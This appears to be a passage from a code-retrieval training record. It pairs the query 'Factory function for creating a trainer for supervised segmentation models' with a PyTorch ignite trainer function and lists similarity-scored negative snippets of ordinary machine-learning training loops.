2\n if epoch_no % 100 == 0:\n self.logger.info(\"Epoch {0}: Loss: {1[0]}, accuracy: {1[1]}\".format(epoch_no, results))\n batch_x_t, batch_y_t = self.mnist.test.next_batch(self.mb_size)\n test_results = self.test_on_batch(batch_x_t, batch_y_t)\n self.logger.info(\"(Test(batch): Loss: {0[0]}, accuracy: {0[1]}\".format(test_results))\n self.test_on_all()\n\n # Save the trained model with all valuable variables.\n saver = tf.train.Saver()\n saver.save(sess=self.sess, save_path='./saved_model', global_step=epoch_no)", "def _train(self):\n epoch_training_time = 0\n epoch_metrics_time = 0\n self.epoch_ += 1\n for i_batch, sample_batched in enumerate(self.dataloader):\n self.global_step_ += 1\n batch_start_time = time.time()\n data_sample = sample_batched[0].to(self.device)\n\n # Get model samples, either from replay buffer or noise.\n if self.model_samples_ is None:\n self.model_samples_ = deque(\n [\n self.net_.sample_from_prior(\n data_sample.shape[0], device=self.device\n ).detach()\n ]\n )\n elif len(self.model_samples_) > self.max_replay:\n self.model_samples_.popleft()\n replay_sample = random.choices(\n self.model_samples_,\n # favor more recent samples:\n weights=list(range(1, len(self.model_samples_) + 1)),\n )[0]\n noise_sample = self.net_.sample_from_prior(\n replay_sample.shape[0], device=self.device\n )\n mask = torch.rand(replay_sample.shape[0]) < self.replay_prob\n while len(mask.shape) < len(replay_sample.shape):\n # Add extra feature-dims\n mask.unsqueeze_(dim=-1)\n\n model_sample = torch.where(\n mask.to(self.device), replay_sample, noise_sample\n )\n\n self.net_.eval()\n # Run at least one iteration\n model_sample = self.net_.sample_fantasy(\n model_sample,\n num_mc_steps=self.num_mc_steps,\n mc_dynamics=self.sampler,\n ).detach()\n\n self.model_samples_.append(model_sample)\n\n # Sanity checks:\n assert (\n data_sample.shape[1:] == self.net_.input_shape\n ), \"Data is incompatible with network.\"\n assert (\n model_sample.shape[1:] == data_sample.shape[1:]\n ), \"Model and data samples are incompatible.\"\n\n # Forward gradient:\n self.net_.train()\n self.net_.zero_grad()\n data_energy_mean = self.net_(data_sample).mean()\n model_energy = self.net_(model_sample)\n model_energy_mean = model_energy.mean()\n\n # Estimate the odds of the data's energy based on a normal fitted to\n # model samples:\n data_erf = torch.erf(\n (data_energy_mean - model_energy_mean) / model_energy.std()\n )\n\n objective = data_energy_mean - model_energy_mean\n objective.backward()\n torch.nn.utils.clip_grad.clip_grad_value_(self.net_.parameters(), 1e2)\n self.optimizer_.step()\n\n batch_training_time = time.time() - batch_start_time\n epoch_training_time += batch_training_time\n self.logger_(energy_diff=float(objective))\n self.logger_(data_erf=float(data_erf))\n\n tr_metrics_start_time = time.time()\n for callback in self.step_callbacks:\n callback(\n net=self.net_,\n data_sample=data_sample,\n model_sample=model_sample,\n epoch=self.epoch_,\n global_step=self.global_step_,\n validation=False,\n )\n tr_metrics_time = time.time() - tr_metrics_start_time\n epoch_metrics_time += tr_metrics_time\n if self.verbose:\n print(\n f\"on epoch {self.epoch_}, batch {i_batch}, data erf: {data_erf}, objective: {objective}\"\n )\n print(f\"model energy: {model_energy_mean} +- {model_energy.std()}\")\n print(f\"data energy: {data_energy_mean}\")\n print(\n f\"training time: {batch_training_time:0.3f}s, metrics time: {tr_metrics_time:0.3f}s\"\n )\n means = self.logger_.means()\n if self.verbose:\n print(f\"on epoch {self.epoch_}\")\n for k, v in means.items():\n print(f\"{k}: {v}\")\n self.logger_.flush()\n means[\"loss\"] = energy_model.utils.constraints.add_soft_constraint(\n means[\"loss_ais\"], means[\"data_erf\"], lower_bound=-1\n )\n return means", "def main():\n # get config and processing of clauses\n config = Config(load=False)\n\n # Generators\n dev = Dataset(config.filename_dev)\n test = Dataset(config.filename_test)\n train = Dataset(config.filename_train)\n\n # Build tags vocab\n vocab_tags = get_tag_vocab([train, dev, test])\n vocab_tags.add(UNK)\n\n # Save vocab\n write_vocab(vocab_tags, config.filename_tags)\n\n\n # Build and save char vocab\n train = Dataset(config.filename_train)\n vocab_chars = get_char_vocab(train)\n write_vocab(vocab_chars, config.filename_chars)", "def train(self):\n ##################\n # YOUR CODE HERE #\n ##################\n start = time.time()\n if self.gae:\n self.train_gae()\n return\n\n def optimize_model():\n R = 0\n for i in reversed(range(len(self.rewards))):\n if abs(self.rewards[i]) > 0.0:\n R = 0\n R = self.rewards[i] + self.gamma * R\n self.rewards[i] = R\n rewards = torch.Tensor(self.rewards)\n if self.var_reduce:\n rewards = (rewards - rewards.mean()) / (rewards.std() + np.finfo(np.float32).eps)\n\n policy_loss = 0.0\n for (log_prob, r) in zip(self.log_probs, rewards):\n policy_loss -= log_prob * r\n\n loss = policy_loss.data[0, 0]\n\n self.opt.zero_grad()\n policy_loss = cu(policy_loss)\n policy_loss.backward()\n self.opt.step()\n\n self.clear_action()\n return loss\n\n self.model.train()\n if USE_CUDA:\n self.model.cuda()\n running_reward = None\n\n for episode in range(1, self.n_episode+1):\n self.init_game_setting()\n state = self.env.reset()\n\n tot_reward = 0\n a, b = 0, 0\n for t in range(self.episode_len):\n action = self.make_action(state, test=False)\n state, reward, done, info = self.env.step(action)\n self.rewards.append(reward)\n if reward > 0:\n a += 1\n if reward < 0:\n b += 1\n tot_reward += reward\n if done:\n break\n\n if running_reward is None:\n running_reward = tot_reward\n else:\n running_reward = 0.99 * running_reward + 0.01 * tot_reward\n\n if episode % self.update_every == 0:\n loss = optimize_model()\n print(\"Episode %d\" % episode)\n print(time_since(start))\n print(\"reward %.4f %d:%d len=%d\" % (running_reward, a, b, t))\n torch.save(self.model.state_dict(), self.model_fn)", "def learn(self):\n epochswin = [] # count the number of wins at every epoch of the network against the preceding version\n epochdraw = [] # count the number of draws at every epoch of the network against the preceding version\n epochswingreedy = [] # count the number of wins against greedy at every epoch\n epochswinrandom = [] # count the number of wins against random at every epoch\n epochsdrawgreedy = [] # count the number of draws against greedy at every epoch\n epochsdrawrandom = [] # count the number of wins against random at every epoch\n epochswinminmax = [] # count the number of wins against minmax at every epoch\n epochsdrawminmax = [] # count the number of draws against minmax at every epoch\n\n\n if self.args.load_model == True:\n file = open(self.args.trainExampleCheckpoint + \"graphwins:iter\" + str(self.args.numIters) + \":eps\" + str(\n self.args.numEps) + \":dim\" + str(self.game.n) + \".txt\", \"r+\")\n lines = file.readlines()\n for index, line in enumerate(lines):\n for word in line.split():\n if index == 0:\n epochswin.append(word)\n elif index == 1:\n epochdraw.append(word)\n file.close()\n\n file = open(self.args.trainExampleCheckpoint + \"graphwins:iter\" + str(self.args.numIters) + \":eps\" + str(\n self.args.numEps) + \":dim\" + str(self.game.n) + \":greedyrandom.txt\", \"r+\")\n lines = file.readlines()\n for index, line in enumerate(lines):\n for word in line.split():\n if index == 0:\n epochswingreedy.append(word)\n elif index == 1:\n epochsdrawgreedy.append(word)\n elif index == 2:\n epochswinrandom.append(word)\n elif index == 3:\n epochsdrawrandom.append(word)\n elif index == 4:\n epochswinminmax.append(word)\n elif index == 5:\n epochsdrawminmax.append(word)\n file.close()\n self.loadTrainExamples()\n\n for i in range(1, self.args.numIters + 1):\n # bookkeeping\n print('------ITER ' + str(i) + '------')\n # examples of the iteration\n iterationTrainExamples = deque([], maxlen=self.args.maxlenOfQueue)\n\n eps_time = AverageMeter()\n bar = Bar('Self Play', max=self.args.numEps)\n end = time.time()\n\n for eps in range(self.args.numEps):\n iterationTrainExamples += self.executeEpisode()\n\n # bookkeeping + plot progress\n eps_time.update(time.time() - end)\n end = time.time()\n bar.suffix = '({eps}/{maxeps}) Eps Time: {et:.3f}s | Total: {total:} | ETA: {eta:}'.format(eps=eps + 1,\n maxeps=self.args.numEps,\n et=eps_time.avg,\n total=bar.elapsed_td,\n eta=bar.eta_td)\n bar.next()\n bar.finish()\n\n # save the iteration examples to the history\n self.trainExamplesHistory.append(iterationTrainExamples)\n\n if len(self.trainExamplesHistory) > self.args.numItersForTrainExamplesHistory:\n print(\"len(trainExamplesHistory) =\", len(self.trainExamplesHistory),\n \" => remove the oldest trainExamples\")\n self.trainExamplesHistory.pop(0)\n # backup history to a file\n # NB! the examples were collected using the model from the previous iteration, so (i-1)\n self.saveTrainExamples(i - 1)\n\n # shuffle examlpes before training\n trainExamples = []\n for e in self.trainExamplesHistory:\n trainExamples.extend(e)\n shuffle(trainExamples)\n\n # training new network, keeping a copy of the old one\n\n filename = \"curent\"+str(i)+\"temp:iter\" + str(self.args.numIters) + \":eps\" + str(self.args.numEps) + \":dim\" + str(\n self.game.n) + \".pth.tar\"\n filenameBest = \"best\" + str(self.args.numIters) + \":eps\" + str(self.args.numEps) + \":dim\" + str(\n self.game.n) + \".pth.tar\"\n\n self.nnet.save_checkpoint(folder=self.args.checkpoint, filename=filename)\n exists = os.path.isfile(filenameBest)\n if exists:\n self.pnet.load_checkpoint(folder=self.args.checkpoint, filename=filenameBest)\n else:\n self.pnet.load_checkpoint(folder=self.args.checkpoint, filename=filename)\n pmcts = MCTS(self.game, self.pnet, self.args)\n\n self.nnet.train(trainExamples)\n nmcts = MCTS(self.game, self.nnet, self.args)\n\n print('PITTING AGAINST PREVIOUS VERSION')\n arena = Arena(lambda x: np.argmax(pmcts.getActionProb(x, temp=0)),\n lambda x: np.argmax(nmcts.getActionProb(x, temp=0)), self.game,nmcts,pmcts,evaluate=True)\n\n pwins, nwins, draws = arena.playGames(self.args.arenaCompare, False)\n\n pmcts.clear()\n nmcts.clear()\n del pmcts\n del nmcts\n\n print(' ')\n print('NEW/PREV WINS : %d / %d ; DRAWS : %d' % (nwins, pwins, draws))\n if i == 1:\n epochswin.append(pwins)\n epochdraw.append(0)\n\n epochswin.append(nwins)\n epochdraw.append(draws)\n self.writeLogsToFile(epochswin, epochdraw)\n\n ''' Get all the players and then pit them against the network. You need to modify here if you implement \n more players\n '''\n (gp, rp, mp) = self.decidePlayers()\n\n if self.args.parallel == 0:\n\n\n nmcts1 = MCTS(self.game, self.nnet, self.args)\n nmcts2 = MCTS(self.game, self.nnet, self.args)\n nmcts3 = MCTS(self.game, self.nnet, self.args)\n\n arenagreedy = Arena(lambda x: np.argmax(nmcts1.getActionProb(x, temp=0)), gp, self.game,nmcts1)\n arenarandom = Arena(lambda x: np.argmax(nmcts2.getActionProb(x, temp=0)), rp, self.game,nmcts2)\n arenaminmax = Arena(lambda x: np.argmax(nmcts3.getActionProb(x, temp=0)), mp, self.game,nmcts3,evaluate=True)\n\n pwinsminmax, nwinsminmax, drawsminmax = arenaminmax.playGames(self.args.arenaCompare)\n print(\"minmax - \"+str(pwinsminmax)+\" \"+str(nwinsminmax)+\" \"+str(drawsminmax))\n pwinsgreedy, nwinsgreedy, drawsgreedy = arenagreedy.playGames(self.args.arenaCompare)\n print(\"greedy - \"+str(pwinsgreedy)+\" \"+str(nwinsgreedy)+\" \"+str(drawsgreedy))\n pwinsreandom, nwinsrandom, drawsrandom = arenarandom.playGames(self.args.arenaCompare)\n print(\"random - \"+str(pwinsreandom)+\" \"+str(nwinsrandom)+\" \"+str(drawsrandom))\n\n nmcts1.clear()\n nmcts2.clear()\n nmcts3.clear()\n del nmcts1\n del nmcts2\n del nmcts3\n\n else:\n '''\n This will be used if you want to evaluate the network against the benchmarks in a parallel way\n '''\n\n self.args.update({'index': str(i)})\n\n p = self.parallel(self.args.arenaCompare)\n (pwinsminmax, nwinsminmax, drawsminmax) = p[0] # self.parallel(\"minmax\", self.args.arenaCompare)\n (pwinsgreedy, nwinsgreedy, drawsgreedy) = p[1] # self.parallel(\"greedy\",self.args.arenaCompare)\n (pwinsreandom, nwinsrandom, drawsrandom) = p[2] # self.parallel(\"random\",self.args.arenaCompare)\n\n epochsdrawgreedy.append(drawsgreedy)\n epochsdrawrandom.append(drawsrandom)\n epochswinrandom.append(pwinsreandom)\n epochswingreedy.append(pwinsgreedy)\n epochswinminmax.append(pwinsminmax)\n epochsdrawminmax.append(drawsminmax)\n\n self.writeLogsToFile(epochswingreedy, epochsdrawgreedy, epochswinrandom, epochsdrawrandom, epochswinminmax,\n epochsdrawminmax, training=False)\n\n if pwins + nwins == 0 or float(nwins) / (pwins + nwins) <= self.args.updateThreshold:\n print('REJECTING NEW MODEL')\n filename = \"curent\"+str(i)+\"temp:iter\" + str(self.args.numIters) + \":eps\" + str(self.args.numEps) + \":dim\" + str(\n self.game.n) + \".pth.tar\"\n filenameBest = \"best\" + str(self.args.numIters) + \":eps\" + str(self.args.numEps) + \":dim\" + str(\n self.game.n) + \".pth.tar\"\n exists = os.path.isfile(filenameBest)\n if exists:\n self.nnet.load_checkpoint(folder=self.args.checkpoint, filename=filenameBest)\n else:\n self.nnet.load_checkpoint(folder=self.args.checkpoint, filename=filename)\n\n else:\n print('ACCEPTING NEW MODEL')\n\n filename = \"best\" + str(self.args.numIters) + \":eps\" + str(self.args.numEps) + \":dim\" + str(\n self.game.n) + \".pth.tar\"\n self.nnet.save_checkpoint(folder=self.args.checkpoint, filename=self.getCheckpointFile(i))\n self.nnet.save_checkpoint(folder=self.args.checkpoint, filename=filename)\n self.mcts.clear()\n del self.mcts\n self.mcts = MCTS(self.game, self.nnet, self.args, mcts=True) # reset search tree\n print(self.tracker.print_diff())\n self.writeLogsToFile(epochswin, epochdraw, training=True)", "def _do_training(self, iteration, batch):\n\n feed_dict = self._get_feed_dict(iteration, batch)\n\n self._session.run(self._training_ops, feed_dict)\n\n if iteration % self._target_update_interval == 0:\n # Run target ops here.\n self._update_target()", "def run_epoch(session, model, eval_op=None, verbose=False, epoch_size=1):\n start_time = time.time()\n all_words = 0\n costs = 0.0\n predicts = []\n\n fetches = {\n \"cost\": model.cost,\n \"mask\": model.mask,\n \"predict\": model.predicts,\n \"seqlen\": model.seq_len,\n \"loss\": model.loss,\n \"label\": model.label,\n \"label_flat\": model.label_flat,\n \"not_space\": model.not_space\n }\n if eval_op is not None:\n fetches[\"eval_op\"] = eval_op\n # if debug:\n # fetches[\"inputs\"] = model.Dinputs\n # fetches[\"states\"] = model.Dstates\n # fetches[\"outputs\"] = model.Doutput\n\n logging.info(\"Epoch size: %d\" % epoch_size) \n print_idx = 0\n for step in range(epoch_size):\n vals = session.run(fetches)\n cost = vals[\"cost\"]\n mask = vals[\"mask\"]\n predict = vals[\"predict\"]\n label = vals[\"label\"]\n np.set_printoptions(threshold=np.nan)\n \n if eval_op is None:\n \n # if step > 497:\n # #for i in range(len(mask)):\n # # print(mask[i])\n # print(np.sum(mask, axis=1))\n # print(vals[\"seqlen\"])\n mask = np.array(np.round(mask), dtype=np.int32)\n shape = mask.shape\n # if step > 10 and step < 20:\n # print(predict)\n # print(np.argmax(predict, 1))\n predict = np.reshape(np.argmax(predict, 1), shape).tolist()\n mask = np.sum(mask, axis=1).tolist()\n for i in range(shape[0]):\n predicts.append(predict[i][:mask[i]])\n\n costs += cost\n words = np.sum(mask)\n all_words += words\n\n if epoch_size < 100:\n verbose = False\n\n if (step * 10 / epoch_size) > print_idx and eval_op is not None:\n print_idx = step * 10 / epoch_size + 1\n logging.info(\"%.3f perplexity: %.3f speed: %.0f wps\" %\n (step * 1.0 / epoch_size, np.exp(costs / step),\n num_gpus * all_words / (time.time() - start_time)))\n predict = np.argmax(predict, 1)\n label_flat = np.reshape(label, [-1])\n all_label_equal = np.equal(predict, label_flat)\n not_space_label = np.not_equal(label_flat, np.zeros(np.shape(label_flat)))\n not_space_equal = all_label_equal * not_space_label\n not_space_label_count = np.sum(not_space_label)\n not_space_equal_count = np.sum(not_space_equal)\n none_space_accuracy = not_space_equal_count / not_space_label_count\n logging.info(\"not space label: %d\" % not_space_label_count)\n logging.info(\"not space correct: %d\" % not_space_equal_count)\n logging.info(\"not space accuracy: %.3f\" % none_space_accuracy)\n logging.info(\"cost: %.3f\" % (costs / step))\n if np.isnan(np.exp(costs / step)):\n print(\"perplexity is nan\")\n print(\"cost: %f step: %d\" % (costs, step))\n return np.exp(costs / step)\n\n if eval_op is None:\n predict = np.reshape(predict, [-1])\n label_flat = np.reshape(label, [-1])\n all_label_equal = np.equal(predict, label_flat)\n not_space_label = np.not_equal(label_flat, np.zeros(np.shape(label_flat)))\n not_space_equal = all_label_equal * not_space_label\n not_space_label_count = np.sum(not_space_label)\n not_space_equal_count = np.sum(not_space_equal)\n none_space_accuracy = not_space_equal_count / not_space_label_count\n logging.info(\"not space label: %d\" % not_space_label_count)\n logging.info(\"not space correct: %d\" % not_space_equal_count)\n logging.info(\"not space accuracy: %.3f\" % none_space_accuracy)\n logging.info(\"cost: %.3f\" % (costs / step))\n return np.exp(costs / epoch_size), predicts\n # elif get_post:\n # # Keep in mind, when get_post, num_steps=1, batch_size=1\n # return np.exp(costs / iters), posteriors\n else:\n return np.exp(costs / epoch_size)", "def _train(self):\n step = 0\n for epoch in range(self.opts.num_epochs):\n self.hub.publish(Topic.EPOCH, epoch)\n for i, data in enumerate(self.loader):\n # Compute loss ...\n # NOTE(ycho): if one of the callbacks require training loss,\n # e.g. for logging, simply register a hook to the loss module\n # rather than trying to extract them here.\n loss = self.loss_fn(self.model, data)\n self.hub.publish(Topic.TRAIN_LOSS, loss)\n\n # Backprop + Optimize ...\n self.optim.zero_grad()\n loss[\"total\"].backward()\n self.optim.step()\n\n # Emit `step` event.\n # == logging, saving, evaluation\n self.hub.publish(Topic.STEP, step)\n step += 1\n\n if step >= self.opts.train_steps:\n return", "def train(self):\n self.emission_model(self.train_data)\n self.transition_model(self.train_data)", "def learn(self, num_episodes=10000):\n for i in range(num_episodes):\n self.actor()\n self.learner()", "def iteration(self, results):\n\n self.db.store_episodes_results(results)\n\n samples = self.db.iter_samples(self.args.q_sample_size,\n self.args.q_learning_iters)\n for sample in samples:\n a1 = self.q1_network.predict_argmax(sample.s2, self.args.batch_size)\n v1 = self.s.run(self.q2_values, {self.states: sample.s2,\n self.actions: a1})\n q1 = sample.r + (~sample.done * self.args.gamma * v1)\n\n a2 = self.q2_network.predict_argmax(sample.s2, self.args.batch_size)\n v2 = self.s.run(self.q1_values, {self.states: sample.s2,\n self.actions: a2})\n q2 = sample.r + (~sample.done * self.args.gamma * v2)\n \n feed_dict = {self.states: sample.s1, self.actions: sample.a}\n\n feed_dict[self.q_estimation] = q1\n self.q2_network.train_in_batches(self.q2_train_op, feed_dict,\n self.args.num_batches, self.args.batch_size)\n\n feed_dict[self.q_estimation] = q2\n self.q1_network.train_in_batches(self.q1_train_op, feed_dict,\n self.args.num_batches, self.args.batch_size)\n\n self.ed.next()", "def train(self):\n pass", "def train(self):\n pass", "def train(self):\n pass" ]
[ "0.6943727", "0.6593037", "0.6503868", "0.6496803", "0.64616853", "0.64566225", "0.64433736", "0.6342452", "0.6339075", "0.6338328", "0.6310606", "0.6282557", "0.62653345", "0.6262677", "0.6250832", "0.6228017", "0.6227637", "0.6218155", "0.6213814", "0.61772126", "0.6165034", "0.6147555", "0.6146779", "0.61331564", "0.613301", "0.61106074", "0.61097497", "0.61008435", "0.61002606", "0.6099648", "0.6087536", "0.6081396", "0.60694665", "0.6066621", "0.6057955", "0.6054285", "0.60092014", "0.59998065", "0.59991", "0.5991994", "0.5988084", "0.59839284", "0.59782755", "0.59759164", "0.59692204", "0.5934571", "0.59318477", "0.5926438", "0.59262127", "0.59228945", "0.59114397", "0.58981514", "0.58969826", "0.58914423", "0.5890575", "0.58893156", "0.5877285", "0.58756495", "0.58746415", "0.5874484", "0.5871121", "0.58696383", "0.5858361", "0.5855989", "0.58541316", "0.5852894", "0.5851739", "0.5851451", "0.5805467", "0.5802409", "0.5802322", "0.5800339", "0.5788158", "0.57872164", "0.5783741", "0.57830364", "0.57786924", "0.57766724", "0.5776564", "0.57729745", "0.57706213", "0.5769942", "0.57653147", "0.57617605", "0.57598937", "0.5757997", "0.5755782", "0.57475966", "0.57453686", "0.57415885", "0.57408696", "0.5738227", "0.5735892", "0.57316923", "0.5730202", "0.57270616", "0.57248664", "0.57214093", "0.57214093", "0.57214093" ]
0.7373323
0
Factory function for creating a trainer for supervised segmentation models.
def create_supervised_trainer( model, optimizer, loss_fn, prepare_batch, device=None, non_blocking=False, output_transform=lambda x, y, y_pred, loss: {"loss": loss.item()}, ): if device: model.to(device) def _update(engine, batch): model.train() optimizer.zero_grad() x, y, ids, patch_locations = prepare_batch(batch, device=device, non_blocking=non_blocking) y_pred = model(x) y_pred = _upscale_model_output(y_pred, y) loss = loss_fn(y_pred.squeeze(1), y.squeeze(1)) loss.backward() optimizer.step() return output_transform(x, y, y_pred, loss) return Engine(_update)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def __init__(self, trainer):\n self.trainer = trainer", "def trainer_factory(\n algorithm: Algorithm, config_overrides: dict, env: Optional[str] = None\n) -> Trainer:\n ensure_moab_envs_register()\n trainer_cls = algorithm.get_trainer_cls()\n default_config = algorithm.get_default_config()\n return trainer_cls(config={**default_config, **config_overrides}, env=env)", "def create_trainer(session_name, # type: AnyStr\n save_dir, # type: AnyStr\n config, # type: thelper.typedefs.ConfigDict\n model, # type: thelper.typedefs.ModelType\n task, # type: thelper.tasks.Task\n loaders, # type: thelper.typedefs.MultiLoaderType\n ckptdata=None # type: Optional[thelper.typedefs.CheckpointContentType]\n ): # type: (...) -> thelper.train.Trainer\n assert \"trainer\" in config and config[\"trainer\"], \"session configuration dictionary missing 'trainer' section\"\n trainer_config = config[\"trainer\"]\n if \"type\" not in trainer_config:\n if isinstance(task, thelper.tasks.Classification):\n trainer_type = thelper.train.ImageClassifTrainer\n elif isinstance(task, thelper.tasks.Detection):\n trainer_type = thelper.train.ObjDetectTrainer\n elif isinstance(task, thelper.tasks.Regression):\n trainer_type = thelper.train.RegressionTrainer\n elif isinstance(task, thelper.tasks.Segmentation):\n trainer_type = thelper.train.ImageSegmTrainer\n else:\n raise AssertionError(f\"unknown trainer type required for task '{str(task)}'\")\n else:\n trainer_type = thelper.utils.import_class(trainer_config[\"type\"])\n return trainer_type(session_name, save_dir, model, task, loaders, config, ckptdata=ckptdata)", "def train(parser):\n cli_args = add_all_args(parser, TRAINING)\n if not cli_args.train_tfrecord and not cli_args.valid_tfrecord:\n assert (\n cli_args.relative_labels or cli_args.xml_labels_folder\n ), 'No labels provided: specify --relative-labels or --xml-labels-folder'\n if cli_args.augmentation_preset:\n assert (\n preset := cli_args.augmentation_preset\n ) in AUGMENTATION_PRESETS, f'Invalid augmentation preset {preset}'\n trainer = Trainer(\n input_shape=cli_args.input_shape,\n model_configuration=cli_args.model_cfg,\n classes_file=cli_args.classes,\n train_tf_record=cli_args.train_tfrecord,\n valid_tf_record=cli_args.valid_tfrecord,\n max_boxes=cli_args.max_boxes,\n iou_threshold=cli_args.iou_threshold,\n score_threshold=cli_args.score_threshold,\n image_folder=cli_args.image_folder,\n )\n trainer.train(\n epochs=cli_args.epochs,\n batch_size=cli_args.batch_size,\n learning_rate=cli_args.learning_rate,\n new_dataset_conf={\n 'dataset_name': (d_name := cli_args.dataset_name),\n 'relative_labels': cli_args.relative_labels,\n 'test_size': cli_args.test_size,\n 'voc_conf': cli_args.voc_conf,\n 'augmentation': bool((preset := cli_args.augmentation_preset)),\n 'sequences': AUGMENTATION_PRESETS.get(preset),\n 'aug_workers': cli_args.workers,\n 'aug_batch_size': cli_args.process_batch_size,\n },\n dataset_name=d_name,\n weights=cli_args.weights,\n evaluate=cli_args.evaluate,\n merge_evaluation=cli_args.merge_evaluation,\n evaluation_workers=cli_args.workers,\n shuffle_buffer=cli_args.shuffle_buffer,\n min_overlaps=cli_args.min_overlaps,\n display_stats=cli_args.display_stats,\n plot_stats=cli_args.plot_stats,\n save_figs=cli_args.save_figs,\n clear_outputs=cli_args.clear_output,\n n_epoch_eval=cli_args.n_eval,\n )", "def create_trainer(config: Config, device: torch.device, split: Split,\n own_split: bool) -> Tuple[Any, ...]:\n ret_type = Tuple[Tensor, Tensor, float]\n\n def output_transform(x: Tensor, y: Tensor,\n y_pred: Tensor, loss: Tensor) -> ret_type:\n \"\"\"What trainer returns to metrics at each step\"\"\"\n return y_pred, y, loss.item()\n\n model, optimizer_fn, criterion, checkpoint = config.model_config\n model = model.to(device)\n optimizer = optimizer_fn(model.parameters())\n if optimizer.__class__ in update_functions:\n update_function = update_functions[optimizer.__class__]\n update = update_function(model, optimizer, criterion, device,\n output_transform, prepare_batch)\n trainer = Engine(update)\n else:\n trainer = create_supervised_trainer(model, optimizer, criterion, device,\n prepare_batch=prepare_batch,\n output_transform=output_transform)\n if checkpoint is not None:\n info(f'Resume from {checkpoint}')\n obj = torch.load(str(checkpoint))\n model.load_state_dict(obj['model'])\n optimizer.load_state_dict(obj['optimizer'])\n trainer.load_state_dict(obj['trainer'])\n if not own_split:\n split = Split.load_state_dict(obj['split'])\n return model, optimizer, criterion, split, trainer", "def create_custom_supervised_trainer(model, optimizer, loss_fn, metrics={}, device=None, prepare_batch=None):\n\n def _update(engine, batch):\n model.train()\n optimizer.zero_grad()\n if not prepare_batch:\n x, y = _prepare_batch(batch, device=device)\n else:\n x, y = prepare_batch(batch, device=device)\n y_pred = model(x)\n loss = loss_fn(y_pred, y)\n loss.backward()\n optimizer.step()\n return loss.item(), y_pred, y\n\n def _metrics_transform(output):\n return output[1], output[2]\n\n engine = Engine(_update)\n\n for name, metric in metrics.items():\n metric._output_transform = _metrics_transform\n metric.attach(engine, name)\n\n return engine", "def build_trainer(\n name: str,\n *,\n default_config: Optional[TrainerConfigDict] = None,\n validate_config: Optional[Callable[[TrainerConfigDict], None]] = None,\n default_policy: Optional[Type[Policy]] = None,\n get_policy_class: Optional[Callable[[TrainerConfigDict], Optional[Type[\n Policy]]]] = None,\n validate_env: Optional[Callable[[EnvType, EnvContext], None]] = None,\n before_init: Optional[Callable[[Trainer], None]] = None,\n after_init: Optional[Callable[[Trainer], None]] = None,\n before_evaluate_fn: Optional[Callable[[Trainer], None]] = None,\n mixins: Optional[List[type]] = None,\n execution_plan: Optional[Callable[[\n WorkerSet, TrainerConfigDict\n ], Iterable[ResultDict]]] = default_execution_plan) -> Type[Trainer]:\n\n original_kwargs = locals().copy()\n base = add_mixins(Trainer, mixins)\n\n class trainer_cls(base):\n _name = name\n _default_config = default_config or COMMON_CONFIG\n _policy_class = default_policy\n\n def __init__(self, config=None, env=None, logger_creator=None):\n Trainer.__init__(self, config, env, logger_creator)\n\n def _init(self, config: TrainerConfigDict,\n env_creator: Callable[[EnvConfigDict], EnvType]):\n # Validate config via custom validation function.\n if validate_config:\n validate_config(config)\n\n # No `get_policy_class` function.\n if get_policy_class is None:\n # Default_policy must be provided (unless in multi-agent mode,\n # where each policy can have its own default policy class.\n if not config[\"multiagent\"][\"policies\"]:\n assert default_policy is not None\n self._policy_class = default_policy\n # Query the function for a class to use.\n else:\n self._policy_class = get_policy_class(config)\n # If None returned, use default policy (must be provided).\n if self._policy_class is None:\n assert default_policy is not None\n self._policy_class = default_policy\n\n if before_init:\n before_init(self)\n\n # Creating all workers (excluding evaluation workers).\n self.workers = self._make_workers(\n env_creator=env_creator,\n validate_env=validate_env,\n policy_class=self._policy_class,\n config=config,\n num_workers=self.config[\"num_workers\"])\n self.execution_plan = execution_plan\n self.train_exec_impl = execution_plan(self.workers, config)\n\n if after_init:\n after_init(self)\n\n @override(Trainer)\n def step(self):\n res = next(self.train_exec_impl)\n return res\n\n @override(Trainer)\n def _before_evaluate(self):\n if before_evaluate_fn:\n before_evaluate_fn(self)\n\n @override(Trainer)\n def __getstate__(self):\n state = Trainer.__getstate__(self)\n state[\"train_exec_impl\"] = (\n self.train_exec_impl.shared_metrics.get().save())\n return state\n\n @override(Trainer)\n def __setstate__(self, state):\n Trainer.__setstate__(self, state)\n self.train_exec_impl.shared_metrics.get().restore(\n state[\"train_exec_impl\"])\n\n @staticmethod\n @override(Trainer)\n def with_updates(**overrides) -> Type[Trainer]:\n \"\"\"Build a copy of this trainer class with the specified overrides.\n\n Keyword Args:\n overrides (dict): use this to override any of the arguments\n originally passed to build_trainer() for this policy.\n\n Returns:\n Type[Trainer]: A the Trainer sub-class using `original_kwargs`\n and `overrides`.\n\n Examples:\n >>> MyClass = SomeOtherClass.with_updates({\"name\": \"Mine\"})\n >>> issubclass(MyClass, SomeOtherClass)\n ... False\n >>> issubclass(MyClass, Trainer)\n ... True\n \"\"\"\n return build_trainer(**dict(original_kwargs, **overrides))\n\n trainer_cls.__name__ = name\n trainer_cls.__qualname__ = name\n return trainer_cls", "def __init__(self, model_name='vgg16'):\n trainer = Trainer(model_name=model_name)\n self.model = trainer.model\n self.model_save_dir = trainer.model_save_dir\n self.model_name = model_name", "def build_trainer(restore_state=None, train_policies=None, config=None):\n \n print(\"Using config\")\n print(config)\n cls = PPOTrainer\n trainer = cls(config=config)\n env = trainer.workers.local_worker().env\n if restore_state is not None:\n trainer.restore_from_object(restore_state)\n return trainer", "def setup_trainer(model, train_dir, train_loader, val_loader,\n property_map, exclude=[]):\n hooks = build_hooks(train_dir=train_dir, property_map=property_map)\n\n trainable_params = filter(lambda p: p.requires_grad, model.parameters())\n trainable_params = filter(lambda p: p not in exclude, trainable_params)\n\n optim = build_optimizer(trainable_params=trainable_params)\n loss_fn = build_loss(property_map=property_map)\n trainer = Trainer(train_dir, model, loss_fn, optim, train_loader,\n val_loader, hooks=hooks)\n return trainer", "def train_model(table, tree_prior, config):\n assert isinstance(table, Table)\n M = config['model_num_clusters']\n D = config['model_latent_dim']\n assert M >= 1\n assert D >= 0\n if D == 0:\n Trainer = TreeCatTrainer\n elif M == 1:\n Trainer = TreeGaussTrainer\n else:\n Trainer = TreeMogTrainer\n return Trainer(table, tree_prior, config).train()", "def train(self, *args, **kwargs):\n raise NotImplementedError", "def train(self):\n model = TreeTrainer.train(self)\n model['latent'] = self._latent\n model['suffstats'] = {\n 'vert_ss': self._vert_ss,\n 'edge_ss': self._edge_ss,\n 'feat_ss': self._feat_ss,\n }\n return model", "def 